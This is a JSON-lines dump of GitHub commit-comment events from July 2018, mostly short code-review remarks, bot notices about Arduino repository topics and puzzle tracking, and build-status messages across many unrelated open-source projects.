{"id":"7960779895","type":"CommitCommentEvent","actor":{"login":"I-m-Eden"},"repo":{"name":"I-m-Eden/alive"},"payload":{"comment":{"id":29696487,"position":null,"line":null,"path":null,"commit_id":"a99adb9a30f57449aa5a90b697d9b3c62f10a903","created_at":"2018-07-13T08:32:20Z","updated_at":"2018-07-13T08:32:20Z","author_association":"OWNER","body":"ppppp!  函数解析式交给您了！"}},"created_at":"2018-07-13T08:32:20Z"}
{"id":"7960779908","type":"CommitCommentEvent","actor":{"login":"DJCrashdummy"},"repo":{"name":"PhilippC/keepass2android"},"payload":{"comment":{"id":29696488,"position":null,"line":null,"path":null,"commit_id":"c8a4978b5f99161f3611005814c2527ff076a11f","created_at":"2018-07-13T08:32:20Z","updated_at":"2018-07-13T08:32:20Z","author_association":"CONTRIBUTOR","body":"you're welcome... thanks for your work!"}},"created_at":"2018-07-13T08:32:20Z"}
{"id":"7960780360","type":"CommitCommentEvent","actor":{"login":"342513581"},"repo":{"name":"xyl66/Thinkphp5"},"payload":{"comment":{"id":29696490,"position":3,"line":3,"path":"README.md","commit_id":"64a4d4f77ce847bcea2f8d53daa41ddbeaa543fc","created_at":"2018-07-13T08:32:26Z","updated_at":"2018-07-13T08:32:26Z","author_association":"NONE","body":"ttt'"}},"created_at":"2018-07-13T08:32:26Z"}
{"id":"7960786190","type":"CommitCommentEvent","actor":{"login":"sanu-krishnan"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":29696504,"position":null,"line":null,"path":null,"commit_id":"23e9c3bca7eb40566ffd4b6cd57b9b4e1f19ad30","created_at":"2018-07-13T08:33:43Z","updated_at":"2018-07-13T08:33:43Z","author_association":"NONE","body":"Thank you for the clarification.\r\nIs there any difference between webrepl.start() and start_foreground() ?\r\n\r\nStart_foreground() shows webrepl started in demeon mode.\r\n"}},"created_at":"2018-07-13T08:33:43Z"}
{"id":"7960792669","type":"CommitCommentEvent","actor":{"login":"foosel"},"repo":{"name":"foosel/OctoPrint"},"payload":{"comment":{"id":29696518,"position":null,"line":null,"path":null,"commit_id":"d3871e34873aa55476a8173859239a1a490fa279","created_at":"2018-07-13T08:35:07Z","updated_at":"2018-07-13T08:35:07Z","author_association":"OWNER","body":"My plan for 1.3.10 is to just pin to 0.1.5 and switch the implementation over to that, but I didn't want to squeeze that into 1.3.9 since it might introduce other \"surprises\"."}},"created_at":"2018-07-13T08:35:07Z"}
{"id":"7960797809","type":"CommitCommentEvent","actor":{"login":"ndmitchell"},"repo":{"name":"haskell-foundation/foundation"},"payload":{"comment":{"id":29696525,"position":47,"line":140,"path":"basement/basement.cabal","commit_id":"556736e5691ecc270a8a8d310b8772b6f07eabf8","created_at":"2018-07-13T08:36:13Z","updated_at":"2018-07-13T08:36:13Z","author_association":"CONTRIBUTOR","body":"See https://github.com/haskell-foundation/foundation/issues/500 for where I raised this as an issue on the tracker."}},"created_at":"2018-07-13T08:36:13Z"}
{"id":"7960798973","type":"CommitCommentEvent","actor":{"login":"miguel-l"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29696528,"position":null,"line":null,"path":null,"commit_id":"9ccb5df49f8e093bc55e566f3abd3308a011f174","created_at":"2018-07-13T08:36:28Z","updated_at":"2018-07-13T08:36:28Z","author_association":"OWNER","body":"Noted, thanks :)"}},"created_at":"2018-07-13T08:36:28Z"}
{"id":"7960801308","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29696533,"position":14,"line":14,"path":"Dodo.Tests/DSL/BoardsControllerBuilder.cs","commit_id":"803c138b8983b9fcdfa0e6bf9dfea3b5cfd26ca2","created_at":"2018-07-13T08:36:59Z","updated_at":"2018-07-13T08:36:59Z","author_association":"MEMBER","body":"Почему Dummy а не Stub? Это же типичный Stub."}},"created_at":"2018-07-13T08:36:59Z"}
{"id":"7960802403","type":"CommitCommentEvent","actor":{"login":"math35"},"repo":{"name":"math35/projet1_MA"},"payload":{"comment":{"id":29696535,"position":null,"line":null,"path":null,"commit_id":"eb1431665bed734f18570837d5623601aacab8fe","created_at":"2018-07-13T08:37:14Z","updated_at":"2018-07-13T08:37:14Z","author_association":"OWNER","body":"C'est un bel ajout!"}},"created_at":"2018-07-13T08:37:14Z"}
{"id":"7960803697","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29696537,"position":4,"line":4,"path":"lesson4/wagon.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T08:37:31Z","updated_at":"2018-07-13T08:37:31Z","author_association":"NONE","body":"У тебя сейчас initialize в Wagon и в его подклассах. В подклассах у тебя не используется метод супер. Если ты не планируешь создавать вагоны без типа, то в инишалайзе тут нет смысла"}},"created_at":"2018-07-13T08:37:31Z"}
{"id":"7960807595","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29696545,"position":2,"line":2,"path":"lesson4/wagon.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T08:38:23Z","updated_at":"2018-07-13T08:38:23Z","author_association":"NONE","body":"Подклассы вагона отвечают на метод :type. И это их и различает. То есть тут типа не должно быть"}},"created_at":"2018-07-13T08:38:23Z"}
{"id":"7960807956","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29696548,"position":98,"line":88,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-13T08:38:27Z","updated_at":"2018-07-13T08:38:27Z","author_association":"OWNER","body":"If Alice is the owner of the contract, I could add onlyOwner modifier to the signature of the claimBack function. The way I set up the contract at the moment, is that it is a service that can be use by multiple senders. "}},"created_at":"2018-07-13T08:38:27Z"}
{"id":"7960808640","type":"CommitCommentEvent","actor":{"login":"DJCrashdummy"},"repo":{"name":"PhilippC/keepass2android"},"payload":{"comment":{"id":29696551,"position":null,"line":null,"path":null,"commit_id":"d181575e936db74c4e66f287eab2ec9eb16ee4c3","created_at":"2018-07-13T08:38:36Z","updated_at":"2018-07-13T08:38:36Z","author_association":"CONTRIBUTOR","body":"i'm also not sure if it is intended (and makes always sense) to mix singular and plural... for example in line 361 and 375 the \"database(s)\"."}},"created_at":"2018-07-13T08:38:36Z"}
{"id":"7960815053","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29696564,"position":null,"line":null,"path":null,"commit_id":"5cf9b2c72a73603cc7ecbecdda539c8df03142e4","created_at":"2018-07-13T08:39:57Z","updated_at":"2018-07-13T08:39:57Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1685 of 1685 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5cf9b2c72a73603cc7ecbecdda539c8df03142e4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5cf9b2c72a73603cc7ecbecdda539c8df03142e4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5cf9b2c72a73603cc7ecbecdda539c8df03142e4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-13T08:39:57Z"}
{"id":"7960815827","type":"CommitCommentEvent","actor":{"login":"Kokan"},"repo":{"name":"balabit/syslog-ng"},"payload":{"comment":{"id":29696566,"position":32,"line":32,"path":"modules/redisq/redisq-options.c","commit_id":"00dcd230012c8349da01133c324d5ffdbcb979c1","created_at":"2018-07-13T08:40:08Z","updated_at":"2018-07-13T08:40:08Z","author_association":"MEMBER","body":"This is not an issue, but could create smaller code. The `g_free` can be called with `NULL` pointer.\r\nYou could simple call `g_free(self->host);` without checking."}},"created_at":"2018-07-13T08:40:08Z"}
{"id":"7960819467","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/zold"},"payload":{"comment":{"id":29696574,"position":null,"line":null,"path":null,"commit_id":"cdb06a0b8a2f2814c2aa933756e5db4c2d7063ab","created_at":"2018-07-13T08:40:52Z","updated_at":"2018-07-13T08:40:52Z","author_association":"COLLABORATOR","body":"Puzzle `98-ed836320` discovered in   [`lib/zold/http.rb`](  https://github.com/zold-io/zold/blob/master/lib/zold/http.rb)   and submitted as #393. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-13T08:40:52Z"}
{"id":"7960820294","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/zold"},"payload":{"comment":{"id":29696575,"position":null,"line":null,"path":null,"commit_id":"cdb06a0b8a2f2814c2aa933756e5db4c2d7063ab","created_at":"2018-07-13T08:41:03Z","updated_at":"2018-07-13T08:41:03Z","author_association":"COLLABORATOR","body":"Puzzle `98-a72851ba` discovered in   [`lib/zold/type.rb`](  https://github.com/zold-io/zold/blob/master/lib/zold/type.rb)   and submitted as #394. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-13T08:41:03Z"}
{"id":"7960824687","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29696590,"position":null,"line":null,"path":null,"commit_id":"6c7e92ce3af2c39dddc0f21485bb5e83d76d845b","created_at":"2018-07-13T08:41:56Z","updated_at":"2018-07-13T08:41:56Z","author_association":"NONE","body":"ну да, но она меньше 100 ))\r\nтипа 81 мне кажется"}},"created_at":"2018-07-13T08:41:56Z"}
{"id":"7960826081","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29696594,"position":null,"line":null,"path":null,"commit_id":"fbf59cbfdcf755457380bc84ac78980f63a4ec9c","created_at":"2018-07-13T08:42:14Z","updated_at":"2018-07-13T08:42:14Z","author_association":"OWNER","body":"Addition:\r\nAnother three methods to achieve a simple copy:\r\n```\r\nimport copy\r\nperson=['name',[saving,100]]\r\np1=copy.copy(person)\r\np1=person[ : ]\r\np1=list(person)\r\n```\r\n\r\nthe use of simple copy:\r\nTo create a chain between two lists:\r\ne.g: a mutual bank account of a couple\r\n```\r\nhusband=person[ : ]\r\nwife=person[ : ]\r\nhusband[0]='Jacket'\r\nwife[0]='Mary'\r\nperson[1][1]=50\r\nprint(husband wife)\r\n>>>['Jacket', ['saving', 50]] ['Mary', ['saving', 50]]\r\n\r\n```\r\n"}},"created_at":"2018-07-13T08:42:14Z"}
{"id":"7960831518","type":"CommitCommentEvent","actor":{"login":"Ajlzhu"},"repo":{"name":"Ajlzhu/learngit"},"payload":{"comment":{"id":29696602,"position":null,"line":null,"path":null,"commit_id":"6394bfa405230e8164647887dd55b38ffe07c015","created_at":"2018-07-13T08:43:15Z","updated_at":"2018-07-13T08:43:15Z","author_association":"OWNER","body":"once again use git"}},"created_at":"2018-07-13T08:43:15Z"}
{"id":"7960833193","type":"CommitCommentEvent","actor":{"login":"winonecheng"},"repo":{"name":"x-village/python-course"},"payload":{"comment":{"id":29696609,"position":4,"line":29,"path":"README.md","commit_id":"adb3ef38434332d0333dab636d4e8669c9550fc6","created_at":"2018-07-13T08:43:35Z","updated_at":"2018-07-13T08:43:35Z","author_association":"COLLABORATOR","body":"test"}},"created_at":"2018-07-13T08:43:35Z"}
{"id":"7960834537","type":"CommitCommentEvent","actor":{"login":"DJCrashdummy"},"repo":{"name":"PhilippC/keepass2android"},"payload":{"comment":{"id":29696611,"position":23,"line":460,"path":"src/keepass2android/Resources/values/strings.xml","commit_id":"d181575e936db74c4e66f287eab2ec9eb16ee4c3","created_at":"2018-07-13T08:43:53Z","updated_at":"2018-07-13T08:43:53Z","author_association":"CONTRIBUTOR","body":"_\"Changes are stored in the internal cache only and will only be synchronized when **<s>switching</s>** selecting Synchronize cache copy with source.\"_"}},"created_at":"2018-07-13T08:43:53Z"}
{"id":"7960838277","type":"CommitCommentEvent","actor":{"login":"Manikaran20"},"repo":{"name":"benblumson/Mereology"},"payload":{"comment":{"id":29696619,"position":511,"line":511,"path":"Mereotopology.thy","commit_id":"259833fb458a52021b2353e189166cd847f0e9a1","created_at":"2018-07-13T08:44:30Z","updated_at":"2018-07-13T08:44:30Z","author_association":"COLLABORATOR","body":"locale GEmonotonicity is not defined anywhere in the file?"}},"created_at":"2018-07-13T08:44:30Z"}
{"id":"7960839300","type":"CommitCommentEvent","actor":{"login":"per1234"},"repo":{"name":"mcauser/Grove-Temperature-Sensor"},"payload":{"comment":{"id":29696622,"position":null,"line":null,"path":null,"commit_id":"e834ba0661e14beaf7f4e2347c75cc143ba2b0e2","created_at":"2018-07-13T08:44:40Z","updated_at":"2018-07-13T08:44:40Z","author_association":"NONE","body":"This repository is an Arduino sketch, not an Arduino library, thus the use of the `arduino-library` topic is inappropriate.\r\n\r\nThe topic can be removed by clicking the \"Manage topics\" link near the top of the repository's home page and then clicking the X to the right of `arduino-library`. I suggest adding the [`arduino-sketch`](https://github.com/topics/arduino-sketch) topic instead."}},"created_at":"2018-07-13T08:44:40Z"}
{"id":"7960843901","type":"CommitCommentEvent","actor":{"login":"Manikaran20"},"repo":{"name":"benblumson/Mereology"},"payload":{"comment":{"id":29696637,"position":465,"line":465,"path":"Mereotopology.thy","commit_id":"259833fb458a52021b2353e189166cd847f0e9a1","created_at":"2018-07-13T08:45:23Z","updated_at":"2018-07-13T08:45:23Z","author_association":"COLLABORATOR","body":"That's not working anymore."}},"created_at":"2018-07-13T08:45:23Z"}
{"id":"7960843926","type":"CommitCommentEvent","actor":{"login":"per1234"},"repo":{"name":"mcauser/Grove-Moisture-Sensor"},"payload":{"comment":{"id":29696638,"position":null,"line":null,"path":null,"commit_id":"cc38b0a3a8acbd5adde16485f2e19daa30a76dd4","created_at":"2018-07-13T08:45:23Z","updated_at":"2018-07-13T08:45:23Z","author_association":"NONE","body":"This repository is an Arduino sketch, not an Arduino library, thus the use of the `arduino-library` topic is inappropriate.\r\n\r\nThe topic can be removed by clicking the \"Manage topics\" link near the top of the repository's home page and then clicking the X to the right of `arduino-library`. I suggest adding the [`arduino-sketch`](https://github.com/topics/arduino-sketch) topic instead."}},"created_at":"2018-07-13T08:45:23Z"}
{"id":"7960843975","type":"CommitCommentEvent","actor":{"login":"his-highness"},"repo":{"name":"his-highness/frontend-learning"},"payload":{"comment":{"id":29696639,"position":10,"line":10,"path":"index.html","commit_id":"5e53dd3f84fd34419eebfb69ad7090e26ef44cba","created_at":"2018-07-13T08:45:23Z","updated_at":"2018-07-13T08:45:23Z","author_association":"OWNER","body":"CSS file is custom.css, not custom12.css."}},"created_at":"2018-07-13T08:45:23Z"}
{"id":"7960848271","type":"CommitCommentEvent","actor":{"login":"Manikaran20"},"repo":{"name":"benblumson/Mereology"},"payload":{"comment":{"id":29696645,"position":483,"line":483,"path":"Mereotopology.thy","commit_id":"259833fb458a52021b2353e189166cd847f0e9a1","created_at":"2018-07-13T08:46:05Z","updated_at":"2018-07-13T08:46:05Z","author_association":"COLLABORATOR","body":"Those theorems were defined in previous mereology file, I think."}},"created_at":"2018-07-13T08:46:05Z"}
{"id":"7960849468","type":"CommitCommentEvent","actor":{"login":"per1234"},"repo":{"name":"mcauser/Grove-IR-Distance-Interrupter"},"payload":{"comment":{"id":29696647,"position":null,"line":null,"path":null,"commit_id":"51887be2627c40a9d1f7d382ad5ef4a45c715aff","created_at":"2018-07-13T08:46:18Z","updated_at":"2018-07-13T08:46:18Z","author_association":"NONE","body":"This repository is an Arduino sketch, not an Arduino library, thus the use of the `arduino-library` topic is inappropriate.\r\n\r\nThe topic can be removed by clicking the \"Manage topics\" link near the top of the repository's home page and then clicking the X to the right of `arduino-library`. I suggest adding the [`arduino-sketch`](https://github.com/topics/arduino-sketch) topic instead."}},"created_at":"2018-07-13T08:46:18Z"}
{"id":"7960850825","type":"CommitCommentEvent","actor":{"login":"per1234"},"repo":{"name":"mcauser/Grove-I2C-FM-Receiver"},"payload":{"comment":{"id":29696648,"position":null,"line":null,"path":null,"commit_id":"f21d3ea1bf01290087c2c47612d14d4e490ee0f5","created_at":"2018-07-13T08:46:35Z","updated_at":"2018-07-13T08:46:35Z","author_association":"NONE","body":"This repository is an Arduino sketch, not an Arduino library, thus the use of the `arduino-library` topic is inappropriate.\r\n\r\nThe topic can be removed by clicking the \"Manage topics\" link near the top of the repository's home page and then clicking the X to the right of `arduino-library`. I suggest adding the [`arduino-sketch`](https://github.com/topics/arduino-sketch) topic instead."}},"created_at":"2018-07-13T08:46:35Z"}
{"id":"7960852414","type":"CommitCommentEvent","actor":{"login":"per1234"},"repo":{"name":"mcauser/Grove-I2C-Color-Sensor"},"payload":{"comment":{"id":29696652,"position":null,"line":null,"path":null,"commit_id":"ca7bebee2eee5ce3bd410b65781a3b2f023f7d06","created_at":"2018-07-13T08:46:53Z","updated_at":"2018-07-13T08:46:53Z","author_association":"NONE","body":"This repository is an Arduino sketch, not an Arduino library, thus the use of the `arduino-library` topic is inappropriate.\r\n\r\nThe topic can be removed by clicking the \"Manage topics\" link near the top of the repository's home page and then clicking the X to the right of `arduino-library`. I suggest adding the [`arduino-sketch`](https://github.com/topics/arduino-sketch) topic instead."}},"created_at":"2018-07-13T08:46:53Z"}
{"id":"7960855284","type":"CommitCommentEvent","actor":{"login":"codebymike"},"repo":{"name":"jamiebuilds/jamie.build"},"payload":{"comment":{"id":29696658,"position":null,"line":null,"path":null,"commit_id":"b66f185df4c2fb25d7da08ba2529eaff5ec16603","created_at":"2018-07-13T08:47:12Z","updated_at":"2018-07-13T08:47:12Z","author_association":"NONE","body":"I was curious too. So I found and read his post [Dear JavaScript,](https://jamie.build/dear-javascript.html).\r\n\r\n> I've always been advised to avoid these \"sub-communities\" like /r/javascript and Hacker News. Maintainers say they are filled with assholes who don't know what they are talking about, angry idiots shouting at everything and everyone, cesspools, giant piles of trash burning in the wind.\r\n\r\nHe's probably correct about random developers being entitled and generally rude to open source maintainers.\r\n"}},"created_at":"2018-07-13T08:47:12Z"}
{"id":"7960855935","type":"CommitCommentEvent","actor":{"login":"per1234"},"repo":{"name":"mcauser/Grove-Flame-Sensor"},"payload":{"comment":{"id":29696659,"position":null,"line":null,"path":null,"commit_id":"791e7e61bb71af1d563abdbb916354e845ed2cb4","created_at":"2018-07-13T08:47:17Z","updated_at":"2018-07-13T08:47:17Z","author_association":"NONE","body":"This repository is an Arduino sketch, not an Arduino library, thus the use of the `arduino-library` topic is inappropriate.\r\n\r\nThe topic can be removed by clicking the \"Manage topics\" link near the top of the repository's home page and then clicking the X to the right of `arduino-library`. I suggest adding the [`arduino-sketch`](https://github.com/topics/arduino-sketch) topic instead."}},"created_at":"2018-07-13T08:47:17Z"}
{"id":"7960857542","type":"CommitCommentEvent","actor":{"login":"per1234"},"repo":{"name":"mcauser/Grove-Ear-Clip-Heart-Rate-Sensor"},"payload":{"comment":{"id":29696661,"position":null,"line":null,"path":null,"commit_id":"f4aa11948b462caa676cc72777c2d61a1c9ec0b9","created_at":"2018-07-13T08:47:30Z","updated_at":"2018-07-13T08:47:30Z","author_association":"NONE","body":"This repository is an Arduino sketch, not an Arduino library, thus the use of the `arduino-library` topic is inappropriate.\r\n\r\nThe topic can be removed by clicking the \"Manage topics\" link near the top of the repository's home page and then clicking the X to the right of `arduino-library`. I suggest adding the [`arduino-sketch`](https://github.com/topics/arduino-sketch) topic instead."}},"created_at":"2018-07-13T08:47:30Z"}
{"id":"7960857872","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29696662,"position":47,"line":47,"path":"Dodo.Tests/BoardsControllerTests.cs","commit_id":"3cce5ea7b475acab7f88152bacd789e4f4685f41","created_at":"2018-07-13T08:47:33Z","updated_at":"2018-07-13T08:47:33Z","author_association":"MEMBER","body":"Мне не очень нравится использование Uuid.Empty\r\nЯ понимаю, что это самый простой способ создать Uuid, но тесты это в том числе и документация. А вы тестом как бы намекаете, что допустимо передавать пустой Uuid.\r\nСоздайте в Arrange какой-то захардкоженный Uuid, например new Uuid(new string('1', 32));\r\nХотя я бы конечно запилил какой-нибудь CreateUuid(\"1\")\r\n"}},"created_at":"2018-07-13T08:47:33Z"}
{"id":"7960861314","type":"CommitCommentEvent","actor":{"login":"dshoulders"},"repo":{"name":"manywho/ui-offline"},"payload":{"comment":{"id":29696666,"position":8,"line":226,"path":"js/services/OfflineCore.ts","commit_id":"a51fc84517caa331c2d72025a9556863f95f4ef9","created_at":"2018-07-13T08:48:04Z","updated_at":"2018-07-13T08:48:04Z","author_association":"NONE","body":"I think you should be able to just return Promise.resolve()"}},"created_at":"2018-07-13T08:48:04Z"}
{"id":"7960862532","type":"CommitCommentEvent","actor":{"login":"per1234"},"repo":{"name":"mcauser/D1_mini_Examples"},"payload":{"comment":{"id":29696672,"position":null,"line":null,"path":null,"commit_id":"70fb2c8774a73d1c6cbc0657f3b9d70b1f7a952f","created_at":"2018-07-13T08:48:15Z","updated_at":"2018-07-13T08:48:15Z","author_association":"NONE","body":"This repository is a collection of Arduino sketches, not an Arduino library, thus the use of the `arduino-library` topic is inappropriate.\r\n\r\nThe topic can be removed by clicking the \"Manage topics\" link near the top of the repository's home page and then clicking the X to the right of `arduino-library`. I suggest adding the [`arduino-sketch`](https://github.com/topics/arduino-sketch) topic instead."}},"created_at":"2018-07-13T08:48:15Z"}
{"id":"7960878796","type":"CommitCommentEvent","actor":{"login":"eyal0"},"repo":{"name":"foosel/OctoPrint"},"payload":{"comment":{"id":29696710,"position":null,"line":null,"path":null,"commit_id":"d3871e34873aa55476a8173859239a1a490fa279","created_at":"2018-07-13T08:50:54Z","updated_at":"2018-07-13T08:50:54Z","author_association":"CONTRIBUTOR","body":"Good plan."}},"created_at":"2018-07-13T08:50:54Z"}
{"id":"7960886096","type":"CommitCommentEvent","actor":{"login":"jhasse"},"repo":{"name":"wxFormBuilder/wxFormBuilder"},"payload":{"comment":{"id":29696727,"position":48,"line":438,"path":"src/md5/md5.cc","commit_id":"092b2f10e72dff5a583c3f53fa8a570928d8ae63","created_at":"2018-07-13T08:52:21Z","updated_at":"2018-07-13T08:52:21Z","author_association":"MEMBER","body":"Dammit, I've missed the added `const` here, which caused the build failure."}},"created_at":"2018-07-13T08:52:21Z"}
{"id":"7960889871","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/zold"},"payload":{"comment":{"id":29696746,"position":null,"line":null,"path":null,"commit_id":"2dc29cc0dbdf095706e00e292c1f9475e4b27781","created_at":"2018-07-13T08:53:07Z","updated_at":"2018-07-13T08:53:07Z","author_association":"COLLABORATOR","body":"Puzzle `285-214c18b0` disappeared from [`lib/zold/upgrades.rb`](https://github.com/zold-io/zold/blob/master/lib/zold/upgrades.rb), that's why I closed #327. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-13T08:53:07Z"}
{"id":"7960892767","type":"CommitCommentEvent","actor":{"login":"sessin"},"repo":{"name":"sessin/jipa"},"payload":{"comment":{"id":29696754,"position":null,"line":null,"path":null,"commit_id":"100eefd0973acc13f1aa422eb5168ee48e5993aa","created_at":"2018-07-13T08:53:42Z","updated_at":"2018-07-13T08:53:42Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-13T08:53:42Z"}
{"id":"7960894537","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29696757,"position":79,"line":79,"path":"Dodo.Tests/BoardsControllerTests.cs","commit_id":"3cce5ea7b475acab7f88152bacd789e4f4685f41","created_at":"2018-07-13T08:54:03Z","updated_at":"2018-07-13T08:54:03Z","author_association":"MEMBER","body":"ShouldUse_Use\r\nБаден-Баден"}},"created_at":"2018-07-13T08:54:03Z"}
{"id":"7960896582","type":"CommitCommentEvent","actor":{"login":"akreisman-epam"},"repo":{"name":"akreisman-epam/java-sdk"},"payload":{"comment":{"id":29696765,"position":16,"line":37,"path":"src/main/java/com/hyperwallet/clientsdk/Hyperwallet.java","commit_id":"b0cb287798249115f7de97e7d9eb513de87c120a","created_at":"2018-07-13T08:54:30Z","updated_at":"2018-07-13T08:54:30Z","author_association":"OWNER","body":"can not change contract, should be back compatible. just add another one constructor"}},"created_at":"2018-07-13T08:54:30Z"}
{"id":"7960900592","type":"CommitCommentEvent","actor":{"login":"kurozael"},"repo":{"name":"CloudSixteen/Clockwork"},"payload":{"comment":{"id":29696770,"position":null,"line":null,"path":null,"commit_id":"2b40cc1fcad19c87defb3aa05e4cc4b24e06f42b","created_at":"2018-07-13T08:55:18Z","updated_at":"2018-07-13T08:55:18Z","author_association":"MEMBER","body":"This shouldn't be done in the hook callback, though. It should really be done in the Clockwork.player.GiveFlags and Clockwork.player.TakeFlags methods, but actually SetCharacterData(\"Flags\", ...) in those methods does automatically call SetSharedVar *because* it's called by SetCharacterData internally as \"Flags\" is already added with AddCharacterData in sh_boot.lua (and networked that way.)\r\n\r\nSo this will cause SetSharedVar to be called twice, the actual bug is that SetCharacterData doesn't appear to be calling SetSharedVar...\r\n\r\nMy other concern is that global flags (GivePlayerFlag) doesn't seem to get networked at all, so there's no way to know client-side what global flags you have?\r\n\r\n@sannysc @Nightmare-Night @xRJx "}},"created_at":"2018-07-13T08:55:18Z"}
{"id":"7960901964","type":"CommitCommentEvent","actor":{"login":"akreisman-epam"},"repo":{"name":"akreisman-epam/java-sdk"},"payload":{"comment":{"id":29696772,"position":21,"line":24,"path":"src/main/java/com/hyperwallet/clientsdk/util/HyperwalletApiClient.java","commit_id":"b0cb287798249115f7de97e7d9eb513de87c120a","created_at":"2018-07-13T08:55:34Z","updated_at":"2018-07-13T08:55:34Z","author_association":"OWNER","body":"same here, lets HyperwalletEncryption hyperwalletEncryption be nullable"}},"created_at":"2018-07-13T08:55:34Z"}
{"id":"7960903555","type":"CommitCommentEvent","actor":{"login":"DulithaPerera"},"repo":{"name":"DulithaPerera/test-repo-1"},"payload":{"comment":{"id":29696779,"position":null,"line":null,"path":null,"commit_id":"f077f39253728c8876442eac8f18708f4979dc51","created_at":"2018-07-13T08:55:53Z","updated_at":"2018-07-13T08:55:53Z","author_association":"OWNER","body":"this is my first ever commit . lets see what happens\r\n"}},"created_at":"2018-07-13T08:55:53Z"}
{"id":"7960909748","type":"CommitCommentEvent","actor":{"login":"akreisman-epam"},"repo":{"name":"akreisman-epam/java-sdk"},"payload":{"comment":{"id":29696797,"position":95,"line":99,"path":"src/main/java/com/hyperwallet/clientsdk/util/HyperwalletApiClient.java","commit_id":"b0cb287798249115f7de97e7d9eb513de87c120a","created_at":"2018-07-13T08:57:07Z","updated_at":"2018-07-13T08:57:07Z","author_association":"OWNER","body":"catch and rethrow runtime please"}},"created_at":"2018-07-13T08:57:07Z"}
{"id":"7960913334","type":"CommitCommentEvent","actor":{"login":"Kokan"},"repo":{"name":"balabit/syslog-ng"},"payload":{"comment":{"id":29696801,"position":27,"line":27,"path":"modules/redisq/CMakeLists.txt","commit_id":"00dcd230012c8349da01133c324d5ffdbcb979c1","created_at":"2018-07-13T08:57:49Z","updated_at":"2018-07-13T08:57:49Z","author_association":"MEMBER","body":"This CMake file is really messy, cannot really understood what you would like to get here. You have like two library, but cannot really got why.\r\nAlso it does not link against the hiredis library, so it does not work :)\r\n\r\nWhat you should get:\r\n* Make it optional\r\n```CMake\r\nif (HIREDIS_FOUND)\r\n  option(ENABLE_REDIS_QUEUE \"Enable redis queue module\" ON) \r\nelse()\r\n  option(ENABLE_REDIS_QUEUE \"Enable redis queue module\" OFF)\r\nendif()\r\n\r\nif (ENABLE_REDIS_QUEUE)\r\n[everything else should be here, the above option block makes this module optional]\r\nendif()\r\n```\r\n* Create one library:\r\n```CMake\r\nadd_library(redis-queue SHARED ${REDIS_QUEUE_SOURCES}) #creates the library\r\ntarget_include_directories(redis-queue\r\n    PRIVATE ${CMAKE_CURRENT_SOURCE_DIR} ${HIREDIS_INCLUDE_DIR}\r\n)\r\ntarget_link_libraries(redis-queue PRIVATE syslog-ng ${HIREDIS_LIBRARIES}) #link against other libraries\r\n```\r\n* Install needed files (this is actually correct as is)\r\n\r\nI leave the task to put it together and finding out what should be in the `${REDIS_QUEUE_SOURCES}`.\r\n\r\nPlease test it with compiling, and starting syslog-ng with redis queue :)\r\n"}},"created_at":"2018-07-13T08:57:49Z"}
